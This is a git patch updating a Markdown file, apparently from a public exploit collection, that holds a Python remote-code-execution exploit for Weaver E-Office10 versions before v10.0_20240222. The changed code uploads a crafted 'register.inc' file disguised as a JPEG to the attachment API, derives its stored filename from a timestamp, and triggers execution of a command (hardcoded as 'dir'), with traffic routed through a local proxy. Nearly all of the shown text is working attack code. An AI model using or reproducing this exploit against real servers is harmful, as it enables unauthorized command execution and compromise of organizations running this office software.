From 7a8ea505ed5179715f67e359bc4183bd07642732 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 30 Mar 2024 16:27:46 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E6=B3=9B=E5=BE=AEE-Office10=E7=89=88?=
 =?UTF-8?q?=E6=9C=AC=E5=B0=8F=E4=BA=8Ev10.0=5F20240222=E5=AD=98=E5=9C=A8?=
 =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��本小于v10.0_20240222存在远程代码执行漏洞.md | 20 ++++++++++++-------
 1 file changed, 13 insertions(+), 7 deletions(-)

diff --git a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
index 569f434..b31ad0f 100644
--- a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
+++ b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
@@ -46,7 +46,7 @@ import hashlib
 import time
 from hashlib import sha1
 import base64
-
+import re
 
 def payload(url,cmd):
     urls = url + '/eoffice10/server/public/api/attachment/atuh-file'
@@ -60,7 +60,7 @@ def payload(url,cmd):
     newfile = data + sha1(data).digest() + final
     upload_file = {"Filedata": ("register.inc", newfile, "image/jpeg")}
     urllib3.disable_warnings()
-    response = requests.post(url=urls, files=upload_file, headers=hearder)  # ,proxies=proxy)
+    response = requests.post(url=urls, files=upload_file, headers=hearder,proxies={"http":"http://127.0.0.1:8081","https":"https://127.0.0.1:8081"})
     response_text = response.text
     attachment_id = json.loads(response_text)['data']['attachment_id']
 
@@ -71,8 +71,13 @@ def payload(url,cmd):
     }
     urllib3.disable_warnings()
     response = requests.post(url=urls, headers=heards, verify=False)  # ,proxies=proxy)
+    print(response.text)
+
     response_json = response.json()
-    filename = str(response_json["histories"][0]["create_time"]) + 'register.inc'
+    create_time = re.findall(r"create_time\":(.*?),\"modify_tim",response.text)
+
+
+    filename = str(create_time) + 'register.inc'
     md5name = hashlib.md5(filename.encode())
     md5name = md5name.hexdigest()
     Time = time.strftime('%Y/%m/%d', time.localtime(time.time()))
@@ -85,13 +90,14 @@ def payload(url,cmd):
     response = requests.post(url=urls, verify=False, headers=hearder)  # ,proxies=proxy)
     response_text = response.text
     print(response_text)
-    result = response_text.split('}')[-1]
-    print(result)
+    #result = response_text.split('}')[-1]
+    #print(result)
 
 
 if __name__ == '__main__':
-    url = input("url: ")
-    cmd = input("要执行的命令: ")
+    url = ""
+    #url = "
+    cmd = "dir"
     if not url.startswith(("http://", "https://")):
         url = "http://" + url
     if url.endswith("/"):